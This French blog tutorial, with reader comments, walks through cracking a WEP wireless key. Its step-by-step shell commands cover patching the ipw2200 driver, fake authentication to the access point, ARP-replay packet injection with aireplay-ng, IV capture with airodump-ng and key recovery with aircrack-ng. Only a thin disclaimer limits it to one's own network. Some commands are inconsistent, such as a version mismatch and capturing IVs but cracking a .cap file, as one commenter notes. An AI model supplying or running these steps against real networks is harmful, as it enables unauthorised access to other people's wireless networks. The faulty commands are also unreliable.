Cracker une clé WEP avec injections de paquets

Accueil » Tutoriels » Cracker une clé WEP avec injections de paquets

Le présent didacticiel vise à tester la vulnérabilité d’un réseau sans-fil. Par conséquent, l’attaque ne devrait être exécutée que sur un réseau dont vous êtes l’administrateur. Je ne suis aucunement responsable de tout geste criminel, ni des problèmes encourus par ce didacticiel.

Tous ceux qui croyaient que c’était impossible de faire une attaque d’injections de paquets sous une carte réseau Intel IPW2200, vous vous êtes fourvoyés! Voici comment j’ai finalement réussi à le faire:

Télécharger le nécessaire

$ cd /home/(dossier_personnel)/wifi/
$ wget http://superb-east.dl.sourceforge.ne…211-1.2.15.tgz
$ wget http://download.aircrack-ng.org/aircrack-ng-0.9.1.tar.gz
$ wget http://jaist.dl.sourceforge.net/sour…2200-1.1.4.tgz
$ wget http://tv.latinsud.com/ipw2200/ipw22…4-inject.patch

Installer l’extension 802.11

$ tar zxvf ieee80211-1.2.15.tgz
$ cd ieee80211-1.2.15
$ sudo make
$ sudo make install

Installer le patch pour Ipw2200

$ cd ..
$ tar zxvf ipw2200-1.1.4.tgz
$ patch -p0 < ipw2200-1.1.4-inject.patch
$ cd ipw2200-1.1.4
$ sudo ./remove-old
$ sudo make
$ sudo make install

Installer la suite aircrak-ng

$ cd ..
$ tar zxvf aircrack-ng-0.9.1.tar.gz
$ cd aircrack-ng-0.6
$ sudo make
$ sudo make install

Activier le patch

$ cd ipw2200-1.1.4
$ sudo rmmod ipw2200
$ sudo insmod ipw2200.ko rtap_iface=1
$ sudo ifconfig eth1 up
$ sudo ifconfig rtap0 up

Vous venez de créer une nouvelle interface sans-fil virtuelle, rtap0, qui vous aidera à faire l’attaque sur le réseaux de concert avec votre carte sans-fil réelle, eth1.

Préparer l’attaque
Vous devez activer votre interface virtuelle rtap0

rmmod ipw2200
modprobe ipw2200 rtap_iface=1

Vous authentifier auprès du point d’accès (routeur sans-fil)
Afin d’initialiser l’injection de paquets, vous devez faire croire au routeur sans-fil que vous êtes un ordinateur légitime. Vous devez donc vous authentifier avec une fausse clé WEP, FFFF-FFFF:

iwconfig eth1 essid NOM_DU_RÉSEAU key FFFF-FFFF mode managed
sleep 3
iwconfig eth1 key off

Lancer l’attaque
Vous êtes authentifié auprès du router; tout est donc prêt pour lancer l’attaque:

aireplay-ng -3 -b ADRESSE_MAC_RÉSEAU -h MAC_ADRESSE_ETH1 -i rtap0 eth1

S’assurer d’être toujours associé au router
Votre carte réseaux physique (eth1) doit toujours être associée au router afin que l’injection fonctionne. Pour s’en assurer, tapez la commande suivante:

watch –interval=1 “ifconfig eth1″

Si vous n’êtes plus associé (c’est écrit “unassociated”), reprenez la section “Vous authentifier auprès du point d’accès” ci-haut, ainsi que la section “Lancer l’attaque”, au besoin.

Enregistrer tous les paquets
Dans une autre fenêtre (control-shift-n), enregistrez tous les paquets qui vous seront envoyés:

airodump-ng –ivs -c 6 -w capture -i rtap0

Décrypter tous les paquets accumulés
Lorsque vous avez accumulé plus de 500 000 paquets (cela devrait prendre quelques minutes), lancez aircrack:

aircrack-ng capture-(nombre).cap

Ré-initialiser la carte sans-fil

Afin de rétablir les paramètres de votre carte sans-fil à la normale, exécutez les commandes:

rmmod ipw2200
modprobe ipw2200

J’espère que vous aurez du plaisir à cracker (votre) une clé WEP!! Si vous avez des questions, n’hésitez pas à les poser ici!

À lire aussi


MauvaisBoff...MoyenBien!Excellent! (4 votes, moyenne: 4.5 sur 5)
Loading ... Loading ...

9 commentaires sur 'Cracker une clé WEP avec injections de paquets'

  1. Nico dit:

    le 2 janvier 2008 à 08:04

    je suppose qu’il faut avoir linux pour réaliser tout ceci dans un terminal? ( je ne connais pa grand choz) n’importe quel version convient??

  2. Alex dit:

    le 2 janvier 2008 à 08:11

    Oui, en effet, mais je crois qu’il existe une version Windows de la suite Aircrack…

  3. Nico dit:

    le 2 janvier 2008 à 18:28

    g un souci avec ta 2eme adresse dans “telecharger le nécessaire” tu peu maider?? celle pour aircrack

  4. Alex dit:

    le 2 janvier 2008 à 18:33

    Télécharge à cette adresse:
    http://download.aircrack-ng.org/aircrack-ng-0.9.1-win.zip

  5. Nico dit:

    le 3 janvier 2008 à 13:55

    Lors de la première commande $ sudo make la réponse est “bash : sudo : commande not found” peux-tu m’aider stp? (j’ai installé linux mandriva)

  6. mehdi dit:

    le 3 février 2008 à 07:19

    ta commande make n’est pas installé

    pour l’installé tu tape :

    apt-get install make

    apres tu verifi ca presence avec la commande :

    $PATH

    voila

  7. matt dit:

    le 11 mars 2008 à 12:45

    J’ai exactement le meme soucis avec Cygwin : pour $ sudo make la réponse est “bash : sudo : commande not found”

    et lorsque je tape : apt-get install make
    Jai droit à : “bash: apt-get: command not found”

    il veut rien “founder” ce con! pourtant j’ai installé une tonne de binaires ds le setup de cygwin mais je sais jamais lesquels prendre pour telle ou telle commande.. j’ai reussit à obtenir wget à taton en installant les binaires au feeling. mais la si quelqun peu me dire quels binaires, quels packages (devel,libs,…?) .

    A l’aide je deviens fou… Merci

  8. boolat dit:

    le 25 mai 2008 à 13:36

    Bonjour,

    j’ai une carte broadcom bcm 94311,
    quand je télécharge tous, puis quand je me lance pour l’installation…

    j’ai des erreurs genre comme ceci :

    —-
    [root@localhost ieee80211-1.2.15]# make
    Checking in /lib/modules/2.6.24.4-laptop-1mnb for ieee80211 components…
    make -C /lib/modules/2.6.24.4-laptop-1mnb/build M=/home/boolat/wifi/ieee80211-1.2.15 modules
    make[1]: entrant dans le répertoire « /usr/src/linux-2.6.24.4-laptop-1mnb »
    CC [M] /home/boolat/wifi/ieee80211-1.2.15/ieee80211_module.o
    /home/boolat/wifi/ieee80211-1.2.15/ieee80211_module.c: In function ‘ieee80211_init’:
    /home/boolat/wifi/ieee80211-1.2.15/ieee80211_module.c:253: erreur: ‘proc_net’ undeclared (first use in this function)
    /home/boolat/wifi/ieee80211-1.2.15/ieee80211_module.c:253: erreur: (Each undeclared identifier is reported only once
    /home/boolat/wifi/ieee80211-1.2.15/ieee80211_module.c:253: erreur: for each function it appears in.)
    /home/boolat/wifi/ieee80211-1.2.15/ieee80211_module.c: In function ‘ieee80211_exit’:
    /home/boolat/wifi/ieee80211-1.2.15/ieee80211_module.c:282: erreur: ‘proc_net’ undeclared (first use in this function)
    make[2]: *** [/home/boolat/wifi/ieee80211-1.2.15/ieee80211_module.o] Erreur 1
    make[1]: *** [_module_/home/boolat/wifi/ieee80211-1.2.15] Erreur 2
    make[1]: quittant le répertoire « /usr/src/linux-2.6.24.4-laptop-1mnb »
    make: *** [modules] Erreur 2

    —-

    la causse vient parceque ma carte wifi n’est pas du intel ? si oui … downloader quelle genre de driver ?

    Merci

  9. WEP dit:

    le 2 septembre 2008 à 07:15

    y a une petite erreur, tu enregistres avec airodump les ivs et tu utilises les cap avec aircrack.

    boobat les chez les broadcom y a que un modele de compatible, divers autres tuto: crack de clé wep et wpa